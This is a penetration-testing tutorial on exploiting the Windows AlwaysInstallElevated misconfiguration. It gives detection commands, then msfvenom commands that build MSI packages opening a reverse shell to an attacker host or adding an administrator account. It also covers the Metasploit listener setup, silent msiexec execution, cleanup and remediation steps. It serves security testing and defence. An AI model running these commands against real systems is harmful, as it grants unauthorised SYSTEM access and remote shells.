AlwaysInstallElevated is a Windows group policy setting that allows non-privileged users to install MSI packages with elevated (SYSTEM) privileges. When enabled, it is one of the easiest and most reliable Windows privilege escalation vectors you will encounter. This tutorial covers detection, exploitation, and the underlying mechanics.
What Is AlwaysInstallElevated?
Windows Installer (msiexec.exe) normally installs MSI packages with the privileges of the user running the installation. The AlwaysInstallElevated policy overrides this behavior, telling the Windows Installer to use elevated privileges for all installations regardless of who initiates them.
This setting exists because some organizations need regular users to install specific software without granting them admin access. The problem is that the setting applies to all MSI packages, not just approved ones. Any user can create a malicious MSI and have it executed with SYSTEM privileges.
For this to be exploitable, the setting must be enabled in both the local machine and current user registry hives. Both keys must be set to 1.
Detecting the Misconfiguration
Manual Registry Query
Check both registry keys:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both return AlwaysInstallElevated REG_DWORD 0x1, the system is vulnerable.
If either key does not exist or is set to 0, this technique will not work.
Using PowerUp.ps1
PowerUp from PowerSploit checks for this automatically:
. .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated
If vulnerable, it will return True for both the HKLM and HKCU checks.
Using winPEAS
The Windows privilege escalation enumeration script winPEAS also checks for this:
winPEASx64.exe quiet windowscreds
Look for the AlwaysInstallElevated section in the output. It will be highlighted if the keys are enabled.
Using Metasploit
If you have a Meterpreter session, the local exploit suggester will flag this:
meterpreter > run post/multi/recon/local_exploit_suggester
Or check specifically:
meterpreter > run post/windows/gather/enum_always_install_elevated
Creating a Malicious MSI with msfvenom
Once you have confirmed the vulnerability, create a malicious MSI package using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o malicious.msi
For a Meterpreter session:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o malicious.msi
You can also create an MSI that adds a local administrator account:
msfvenom -p windows/adduser USER=hacker PASS=Password123! -f msi -o adduser.msi
Setting Up the Listener
Start your listener before executing the MSI:
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run
Exploitation
Transfer the malicious MSI to the target system and execute it.
Silent Installation (Preferred)
Run the MSI silently to avoid any installation dialogs:
msiexec /quiet /qn /i C:\Temp\malicious.msi
The flags:
/quiet- suppresses all user interface/qn- no UI at all (not even a progress bar)/i- install mode
Because AlwaysInstallElevated is enabled, msiexec runs the installation with SYSTEM privileges even though your user is unprivileged. Your reverse shell connects back with SYSTEM access.
Using PowerUp
PowerUp can handle the exploitation automatically:
Write-UserAddMSI
This creates UserAdd.msi in the current directory. When executed, it adds a new local administrator. Then install it:
msiexec /quiet /qn /i UserAdd.msi
Using Metasploit Module
Metasploit has a dedicated module for this:
use exploit/windows/local/always_install_elevated
set SESSION 1
set LHOST 10.10.14.5
set LPORT 5555
run
This automatically generates and executes the MSI through your existing session.
Verifying Success
After exploitation, verify your privileges:
whoami
You should see NT AUTHORITY\SYSTEM. If you used the adduser payload instead:
net user hacker
net localgroup administrators
Confirm the new user exists and is in the administrators group.
Understanding Why This Works
The Windows Installer service (msiserver) runs as SYSTEM. When AlwaysInstallElevated is enabled, the installer service processes MSI packages at SYSTEM privilege level for all users. The MSI file format supports custom actions, which are essentially arbitrary code execution hooks that run during installation. Msfvenom creates an MSI with a custom action containing your payload, which the installer service executes as SYSTEM.
Cleanup
After the engagement, clean up your artifacts:
del C:\Temp\malicious.msi
If you created a user:
net user hacker /delete
Document everything you changed for the client report.
Defensive Recommendations
If you find this misconfiguration during an engagement, here are the remediation steps to include in your report:
Disable the policy: Set both registry keys to 0 or delete them:
reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f
reg delete HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f
Or through Group Policy Editor: Computer Configuration > Administrative Templates > Windows Components > Windows Installer > "Always install with elevated privileges" - set to Disabled.
Use AppLocker: Restrict which MSI packages can be installed based on publisher, path, or file hash.
Application whitelisting: Tools like Windows Defender Application Control (WDAC) can prevent unauthorized MSI execution.
Monitor MSI installations: Enable Windows Installer logging and monitor for unexpected MSI executions, especially silent installations.
Summary
AlwaysInstallElevated is a low-hanging fruit that you should check for on every Windows engagement. The detection is simple (two registry queries), the exploitation is reliable (msfvenom MSI), and the result is SYSTEM access. Add this to your standard enumeration checklist and you will be surprised how often it shows up in enterprise environments.